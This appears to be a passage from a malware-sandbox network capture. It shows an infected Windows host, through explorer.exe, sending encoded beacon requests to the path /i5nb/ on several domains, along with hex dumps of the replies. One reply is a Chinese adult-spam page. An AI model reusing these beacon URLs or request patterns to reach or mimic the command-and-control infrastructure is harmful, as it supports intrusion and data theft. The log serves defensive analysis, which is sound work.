Server: Apache/2.4.25 (Debian)
Set-Cookie: __tad=1642101769.6856294; expires=Sun, 11-Jan-2032 19:22:49 GMT; Max-Age=315360000
Location: http://ww25.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew==&subid1=20220114-0622-493b-bd82-791d388f7025
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
2           192.168.2.22  49169        195.211.74.112   80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Jan 13, 2022 20:22:54.941361904 CET  441                 OUT        GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1
Host: www.circlessalaries.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2022 20:22:54.977261066 CET  442                 IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 Jan 2022 19:22:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.2.24
                                                  Data Raw: 31 66 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 6c 61 63 65 68 6f 6c 64 65 72 20 26 6e 64 61 73 68 3b 20 41 6e 74 61 67 6f 6e 69 73 74 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6e 74 61 67 6f 6e 69 73 74 2e 6e 6c 2f 73 74 61 74 69 63 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2e 33 2e 31 2e 6d 69 6e 2e 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6e 74 61 67 6f 6e 69 73 74 2e 6e 6c 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 33 2e 34 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6c 61 6d 3a 34 30 30 7c 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6e 74 61 67 6f 6e 69 73 74 2e 6e 6c 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 32 31 35 37 3b 0a 20 20 20 20 2d 2d 70 69 6e 6b 3a 20 23 65 63 30 30 38 63 3b 0a 20 20 
20 20 2d 2d 6f 72 61 6e 67 65 3a 20 23 66 66 38 34 30 30 3b 0a 20 20 20 20 2d 2d 64 61 72 6b 2d 6f 72 61 6e 67 65 3a 20 72 67 62 28 32 34 32 2c 20 38 30 2c 20 30 29 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 40 6b 65 79 66 72 61 6d 65 73 20 62 61 63 6b 67 72 6f 75 6e 64 20 7b 0a 0a 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 20 31 30 72 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 20 74 6f 70 3b 0a 20 20 20 20 7d 0a 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 2e 61 70 2d 62 74 6e 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 33 2e 35 72 65 6d 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 2e 37 35 72 65 6d 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 33 30 25 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 2e 32 35 25 3b 0a 7d 0a 0a 2e 61 70 2d 62 74 6e 20 70 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 62 6c 75 65 29 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 2e 35 72 65 6d 3b 0a 7d 0a 0a 2e 61 70 2d 62 74 6e 20 69 6d 67 20 7b 0a 20 20 20 20 77 69 64 74 68 3a
                                                  Data Ascii: 1fa8<!DOCTYPE html><html> <head> <title>Placeholder &ndash; Antagonist</title> <link rel="stylesheet" href="https://www.antagonist.nl/static/css/bootstrap/bootstrap-4.3.1.min.css"> <script src="https://www.antagonist.nl/static/js/jquery/jquery-3.4.1.min.js"></script> <link href="https://fonts.googleapis.com/css?family=Kalam:400|Open+Sans:300,400,600,700&display=swap" rel="stylesheet"> <link rel="icon" href="https://www.antagonist.nl/favicon.ico"> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>:root { --blue: #002157; --pink: #ec008c; --orange: #ff8400; --dark-orange: rgb(242, 80, 0);}</style> <style>@keyframes background { 0% { background-position-y: 10rem; } 100% { background-position-y: top; }}</style> <style>.ap-btn { background-color: white; display: inline-block; height: 3.5rem; border-radius: 1.75rem; width: 30%; margin-left: 2.25%;}.ap-btn p { color: var(--blue); display: inline; line-height: 3.5rem;}.ap-btn img { width:


Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
3           192.168.2.22  49170        122.10.28.11     80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Jan 13, 2022 20:23:00.496769905 CET  495                 OUT        GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1
Host: www.ylhwcl.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2022 20:23:00.774905920 CET  496                 IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 Jan 2022 19:23:00 GMT
Content-Type: text/html
Content-Length: 1865
Connection: close
Vary: Accept-Encoding
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d5 c5 b1 b1 d5 d7 d5 d5 cd b6 d7 ca d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 35 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 2c 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 35 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 2c 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 
30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#31934;&#21697;&#22269;&#20135;&#95;&#20122;&#27954;&#20154;&#25104;&#22312;&#32447;,&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#28459;&#32593;&#31449;&#20813;&#36153;&#35266;&#30475;</title><meta name="keywords" content="&#31934;&#21697;&#22269;&#20135;&#95;&#20122;&#27954;&#20154;&#25104;&#22312;&#32447;,&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#28459;&#32593;&#31449;&#20813;&#36153;&#35266;&#30475;" /><meta name="description" content="&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#2


                                                  Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
                                                  4           192.168.2.22  49171        216.172.160.188  80                C:\Windows\explorer.exe
                                                  Timestamp                            kBytes transferred  Direction  Data
                                                  Jan 13, 2022 20:23:06.112768888 CET  498                 OUT        GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.terapiaholisticaemformacao.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:06.319093943 CET  499                 IN         HTTP/1.1 404 Not Found
                                                  Date: Thu, 13 Jan 2022 19:23:06 GMT
                                                  Server: Apache
                                                  Upgrade: h2,h2c
                                                  Connection: Upgrade, close
                                                  Last-Modified: Fri, 26 Jul 2019 13:18:26 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 2361
                                                  Vary: Accept-Encoding
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 
6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 39 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 3e
                                                  Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domínio Grátis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120">


                                                  Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                  5           192.168.2.22  49172        192.185.98.251  80                C:\Windows\explorer.exe
                                                  Timestamp                            kBytes transferred  Direction  Data
                                                  Jan 13, 2022 20:23:11.619415045 CET  501                 OUT        GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1
                                                  Host: www.ecommerceoptimise.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:11.771730900 CET  503                 IN         HTTP/1.1 404 Not Found
                                                  Date: Thu, 13 Jan 2022 19:23:11 GMT
                                                  Server: Apache
                                                  Upgrade: h2,h2c
                                                  Connection: Upgrade, close
                                                  Last-Modified: Fri, 14 Feb 2020 00:55:46 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 11816
                                                  Vary: Accept-Encoding
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 
68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 67 61 74 6f 72 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74 3a 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 61 75 74
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title><!-- Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:39px;float:left;} #container #mid404 #xxx{float:left;padding:40px 397px 10px; margin: auto aut


                                                  Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
                                                  6           192.168.2.22  49174        221.121.143.148  80                C:\Windows\explorer.exe
                                                  Timestamp                            kBytes transferred  Direction  Data
                                                  Jan 13, 2022 20:23:17.360008955 CET  515                 OUT        GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.integratedheartspsychology.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:17.639343023 CET  516                 IN         HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
